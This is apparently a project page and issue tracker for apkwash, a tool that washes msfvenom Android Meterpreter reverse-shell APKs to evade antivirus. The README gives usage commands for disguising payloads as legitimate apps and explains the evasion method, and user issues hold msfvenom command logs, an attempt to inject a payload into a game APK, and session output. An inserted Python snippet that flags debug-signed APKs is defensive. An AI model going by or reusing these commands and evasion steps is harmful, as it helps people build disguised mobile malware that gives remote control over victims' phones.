
apkwash's Introduction

apkwash

Android APK Antivirus evasion for msfvenom generated payloads.

Tested on Kali Linux rolling.

Setup:
apt-get update && apt-get dist-upgrade
chmod +x apkwash
mv apkwash /usr/local/bin/.

On first run:
- Downloads and places apktool.jar in the user's /usr/local/bin directory
- Generates a debug keystore for signing. Places it in ~/.android/


Usage Example:
apkwash -p android/meterpreter/reverse_https LHOST= LPORT= -o LegitAndroidApp.apk

Output:
<LegitAndroidApp>.apk & <LegitAndroidApp>.listener

Default values:
payload=android/meterpreter/reverse_https
LHOST=<eth0 IP address>
LPORT=443
output=AndroidService.apk

Options
-p | --payload <payload> This sets the payload to be generated by msfvenom.
-o | --output <outfile.apk> This sets the name of the APK created as well as the output apk file.
-x | --original <infile.apk> Input APK to inject the payload into (later update).
-g | --generate Generate a payload using defaults
-n | --newkey Generate a new debug key before signing
-v | --verbose Don't mask output of commands
-d | --debug Leaves the /tmp/payload files in place for review
-h | --help Help information


Antivirus detection:
2/35 on nodistribute - 2Aug17
Will be updating soon to cover these two flags.

FLAGGED BY AVAST!
APK:CloudRep[Susp] is the report for the suspicious app on Avast.
Per Avast: "the APK:CloudRep [Susp] is a warning-like message for applications that are very new/rare/previously unseen in our userbase." Based on this alone it doesn't appear we can modify anything to avoid being flagged. It allows the user to accept the risks, or uninstall the app.

Modifications:
Feel free to open the script and make improvements. This script basically utilizes APKTool to open the package, uses sed to replace strings that flag AV, recompiles, then signs.
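Added here as a defender-side example, not code from the apkwash project or its README: the README says the washed package is signed with a debug keystore generated under ~/.android/. An APK signed with an Android debug certificate is something a release pipeline never ships, so it is a cheap triage indicator when reviewing sideloaded apps. The script below uses only the Python standard library: it opens the APK as a zip, pulls the v1 (JAR) signature blocks from META-INF/, and extracts the commonName values from the DER-encoded certificate chain with a small OID scanner rather than a full ASN.1 parser. It assumes the signer's CN contains "Android Debug" (the Android SDK's default debug DN); the keystore apkwash generates may use a different DN, so treat DEBUG_CN_MARKER as configurable. The sample APK and its certificate bytes are constructed inline.

```python
import io
import zipfile

# OID 2.5.4.3 (commonName) as DER: tag 0x06, length 3, value 55 04 03
CN_OID = b"\x06\x03\x55\x04\x03"
# ASN.1 string tags that may carry a DN attribute value
STRING_TAGS = {0x0C: "UTF8String", 0x13: "PrintableString", 0x14: "T61String", 0x1E: "BMPString"}
# Assumption: the Android SDK default debug certificate uses CN=Android Debug
DEBUG_CN_MARKER = "android debug"


def common_names(der: bytes):
    """Return every commonName value found in a DER blob (e.g. a PKCS#7 signature block).

    Deliberately a scanner, not a parser: it looks for the CN OID and reads the
    string that immediately follows it. Good enough for triage, not for validation.
    """
    names = []
    pos = 0
    while True:
        idx = der.find(CN_OID, pos)
        if idx < 0:
            break
        pos = idx + len(CN_OID)
        if pos + 2 > len(der):
            break
        tag, length = der[pos], der[pos + 1]
        # Only short-form lengths (< 0x80) are handled; DN values are always short.
        if tag in STRING_TAGS and length < 0x80 and pos + 2 + length <= len(der):
            raw = der[pos + 2:pos + 2 + length]
            names.append(raw.decode("utf-16-be") if tag == 0x1E else raw.decode("latin-1"))
    return names


def signature_blocks(apk_bytes: bytes):
    """Yield (entry name, DER bytes) for each v1 signature block under META-INF/."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        for name in z.namelist():
            if name.startswith("META-INF/") and name.upper().endswith((".RSA", ".DSA", ".EC")):
                yield name, z.read(name)


def assess_apk(apk_bytes: bytes):
    """Return a list of human-readable findings about how the APK was signed."""
    findings = []
    blocks = list(signature_blocks(apk_bytes))
    if not blocks:
        # v2/v3 signatures live in the APK Signing Block, not META-INF, so this is
        # only "no v1 signature", not "unsigned"; confirm with apksigner verify.
        findings.append("no v1 signature block in META-INF (unsigned, or v2/v3 only; check with apksigner)")
    for name, der in blocks:
        cns = common_names(der)
        if any(DEBUG_CN_MARKER in cn.lower() for cn in cns):
            findings.append(f"{name}: signed with an Android debug certificate (CN values: {cns})")
    return findings


def build_sample_apk(signer="debug") -> bytes:
    """Construct a minimal APK-shaped zip for demonstration (constructed sample, not a real app).

    signer: "debug" -> CN=Android Debug, "release" -> a release-style CN, None -> no META-INF.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", b"<placeholder/>")
        z.writestr("classes.dex", b"dex\n035\x00placeholder")
        if signer is not None:
            cn = b"Android Debug" if signer == "debug" else b"Example Corp Release"
            # SEQUENCE wrapper followed by a CN attribute; the scanner ignores the outer length.
            cert = b"\x30\x82\x01\x00" + CN_OID + bytes([0x13, len(cn)]) + cn
            z.writestr("META-INF/CERT.SF", b"Signature-Version: 1.0\n")
            z.writestr("META-INF/CERT.RSA", cert)
    return buf.getvalue()


if __name__ == "__main__":
    for label in ("debug", "release", None):
        print(label, "->", assess_apk(build_sample_apk(label)) or ["no findings"])
```

On a real file, replace build_sample_apk() with open("app.apk", "rb").read(); a debug-certificate hit on an app that arrived outside an app store is worth escalating, and the "no v1 signature" finding should be followed by apksigner verify --print-certs before drawing any conclusion.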


Files:
/tmp/payload (Main files to review: AndroidManifest.xml and the smali files)

Debugging
Run with '-d' and '-v' to display as much output as possible and to leave the /tmp/payload files in place.


If you are seeing other "Payload".smali files in /tmp/payload/smali/com/var1/var2/ then be sure you have an updated system (apt-get update && apt-get dist-upgrade). I have found that an older msfvenom version outputs a different payload that will be flagged by AVG (1/35 on nodistribute). Making sure you are completely updated should resolve this.

apkwash's People

Contributors

iamalsaher, jbreed

apkwash's Issues

Name

Previously, after installing the payload its name was 'Androidservice', but now it is 'MainActivity'. How can I produce a payload with the name 'Androidservice'?

Issues with timwr apk merge script

May I suggest adding support for xc0d3rz metasploit-apk-embed-payload, so that this script becomes a one-stop shop. Wash the APK and merge.

Brut fails

└─$ sudo apkwash -p android/meterpreter/reverse_https LHOST=192.168.1.125 LPORT=1023 -o output.apk -v -d
 [-]  Generating MSFVenom payload
 [-]  msfvenom -p android/meterpreter/reverse_https LHOST=192.168.1.125 LPORT=1023 -o output.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10515 bytes
Saved as: output.apk
 [-]  MSFVenom payload successfully generated.
 [-]  Opening the generated payload with APKTool.
I: Using Apktool 2.2.4 on output.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
 [-]  Scrubbing the payload contents to avoid AV signatures...
 [-]  Finished scrubbing the content. Rebuilding the package with APKTool.
I: Using Apktool 2.2.4
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
Exception in thread "main" W: /tmp/brut_util_Jar_3015128125048258067.tmp: 1: Syntax error: "(" unexpected
brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 2): [/tmp/brut_util_Jar_3015128125048258067.tmp, p, --forced-package-id, 127, --min-sdk-version, 10, --target-sdk-version, 17, --version-code, 1, --version-name, 1.0, --no-version-vectors, -F, /tmp/APKTOOL207953231138486468.tmp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/payload/res, -M, /tmp/payload/AndroidManifest.xml]
	at brut.androlib.Androlib.buildResourcesFull(Androlib.java:496)
	at brut.androlib.Androlib.buildResources(Androlib.java:430)
	at brut.androlib.Androlib.build(Androlib.java:329)
	at brut.androlib.Androlib.build(Androlib.java:267)
	at brut.apktool.Main.cmdBuild(Main.java:230)
	at brut.apktool.Main.main(Main.java:83)
Caused by: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 2): [/tmp/brut_util_Jar_3015128125048258067.tmp, p, --forced-package-id, 127, --min-sdk-version, 10, --target-sdk-version, 17, --version-code, 1, --version-name, 1.0, --no-version-vectors, -F, /tmp/APKTOOL207953231138486468.tmp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/payload/res, -M, /tmp/payload/AndroidManifest.xml]
	at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:441)
	at brut.androlib.Androlib.buildResourcesFull(Androlib.java:482)
	... 5 more
Caused by: brut.common.BrutException: could not exec (exit code = 2): [/tmp/brut_util_Jar_3015128125048258067.tmp, p, --forced-package-id, 127, --min-sdk-version, 10, --target-sdk-version, 17, --version-code, 1, --version-name, 1.0, --no-version-vectors, -F, /tmp/APKTOOL207953231138486468.tmp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/payload/res, -M, /tmp/payload/AndroidManifest.xml]
	at brut.util.OS.exec(OS.java:95)
	at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:435)
	... 6 more
 [-]  Washed package created: output.apk
mv: cannot stat '/tmp/payload/dist/output.apk': No such file or directory
 [-]  Checking for ~/.android/debug.keystore for signing
 [-]  Attempting to sign the package with your android debug key
/usr/local/bin/apkwash: line 50: jarsigner: command not found
 [-]  Signed the .apk file with ~/.android/debug.keystore
 [-]  To generate a new key per package use the '-n' option
 [-]  Cleaning up 
 [-]  Finished generating the payload.
 [-]  Please do not upload the washed/injected files to VirusTotal.com
 [-]  Use nodistribute.com, or manual scanning on a device.
 [-]  Generating an msf listener script
 [-]  Add an AutoRunScript? [y/N] n
 [-]  Listener script has been generated: /tmp/output.listener
 [-]  Start listener with: msfconsole -r /tmp/output.listener
 [-]  Launch listener now? [y/N] n
 [?]  Smali file structure: com.ribhheqzcx.jzxrqohrgz

This is the log. For some reason this brut tool fails. Could you fix or provide manual steps to perform the same tasks this "brut" tool is doing?

Error: No such file or directory @ rb_sysopen

Hi,
I get the below error when I run the command "sudo apkwash -p android/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=4444 -o /home/kali/finaltraffic.apk -x /home/kali/com.skgames.trafficrider_2020-07-17.apk -verbose"

Error:

[*] Rebuilding apk with meterpreter injection as /tmp/d20210731-6677-jfu2om/output.apk
[*] Signing /tmp/d20210731-6677-jfu2om/output.apk
[*] Aligning /tmp/d20210731-6677-jfu2om/output.apk
Payload size: 116081404 bytes
Error: No such file or directory @ rb_sysopen - injected_/home/kali/com.skgames.trafficrider_2020-07-17.apk
[!] MSFVenom payload generation failed. Run with verbose for more information on the MSFVenom output.
[-] Generating an msf listener script
[-] Add an AutoRunScript? [y/N]

Can you please help?

APK DOESN'T ASK PERMISSIONS

Hello, everything is generated, but when I install the infected APK on my phone it doesn't ask for any permissions, so many meterpreter modules don't work.

Do you have a solution?

Thanks in advance.

command not found

I followed all the steps, but got: bash: apkwash: command not found
and root@ter:~/apkwash# ./apkwash
eth0: error fetching interface information: Device not found
./apkwash: line 40: apkwash: command not found

Can you help me?
Kali GNU/Linux Rolling 64-bit

apkwash error after complete update and dist-upgrade on kali

root@Devilz-PC:/tmp# apkwash -p android/meterpreter_reverse_http LHOST=speedyzz.ml LPORT=4450 -o payload.apk
 [-]  Generating MSFVenom payload
 [-]  msfvenom -p android/meterpreter_reverse_http LHOST=speedyzz.ml LPORT=4450 -o payload.apk
 [-]  MSFVenom payload successfully generated.
 [-]  Opening the generated payload with APKTool.
 [-]  Scrubbing the payload contents to avoid AV signatures...
 [!]  An old version of the msfvenom generated payload was detected. Make sure you have everything compeltely updated in Kali! 

 Older payloads have not been configured in this script to bypass AV. With that, this script still results in a 1/35 on nodistribute.com for the old payloads, but it is not recommended to continue. Ex: # apt-get update && apt-get dist-upgrade
DISTRIB_ID=Kali
DISTRIB_RELEASE=kali-rolling
DISTRIB_CODENAME=kali-rolling
DISTRIB_DESCRIPTION="Kali GNU/Linux Rolling"
PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
VERSION="2017.2"
VERSION_ID="2017.2"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="http://www.kali.org/"
SUPPORT_URL="http://forums.kali.org/"
BUG_REPORT_URL="http://bugs.kali.org/"

Only the following 3 payloads do not work:
android/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell
android/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell
android/meterpreter_reverse_tcp Connect back to the attacker and spawn a Meterpreter shell

Please Help!!!!

mv: cannot stat '/tmp/payload/smali/com/metasploit'

I need help here. How do I fix this?
$ apkwash -p android/meterpreter/reverse_https lhost=192.168.1.102 lport=4444 -o /root/Desktop/asd.apk

[-] Generating MSFVenom payload
[-] msfvenom -p android/meterpreter/reverse_https LHOST=192.168.1.102 LPORT=443 -o /root/Desktop/asd.apk
[-] MSFVenom payload successfully generated.
[-] Opening the generated payload with APKTool.
[-] Scrubbing the payload contents to avoid AV signatures...
mv: cannot stat '/tmp/payload/smali/com/metasploit': No such file or directory
mv: cannot stat '/tmp/payload/smali/com/owkyekerbp/stage': No such file or directory
mv: cannot stat '/tmp/payload/smali/com/owkyekerbp/gxqskstfpk/Payload.smali': No such file or directory
sed: can't read /tmp/payload/smali/com/owkyekerbp/gxqskstfpk/: No such file or directory
sed: can't read /tmp/payload/smali/com/owkyekerbp/gxqskstfpk/
: No such file or directory
sed: can't read /tmp/payload/smali/com/owkyekerbp/gxqskstfpk/nqljlwqgpu.smali: No such file or directory
sed: can't read /tmp/payload/smali/com/owkyekerbp/gxqskstfpk/nqljlwqgpu.smali: No such file or directory
sed: can't read /tmp/payload/AndroidManifest.xml: No such file or directory
sed: can't read /tmp/payload/AndroidManifest.xml: No such file or directory
sed: can't read /tmp/payload/res/values/strings.xml: No such file or directory
sed: can't read /tmp/payload/AndroidManifest.xml: No such file or directory
sed: can't read /tmp/payload/AndroidManifest.xml: No such file or directory
[-] Finished scrubbing the content. Rebuilding the package with APKTool.
[-] Washed package created: /root/Desktop/asd.apk
mv: cannot stat '/tmp/payload/dist/AndroidService.apk': No such file or directory
[-] Checking for ~/.android/debug.keystore for signing

Can somebody tell me how to fix this? Thanks

meterpreter sessions closes immediately

msf exploit(handler) > run
[*] Sending stage (67614 bytes) to 192.168.0.3
[*] Meterpreter session 2 opened (192.168.0.7:4444 -> 192.168.0.3:34346) at 2017-07-28 00:32:32 -0400
[*] 192.168.0.3 - Meterpreter session 2 closed. Reason: Died
[-] Meterpreter session 2 is not valid and will be closed

please help ....
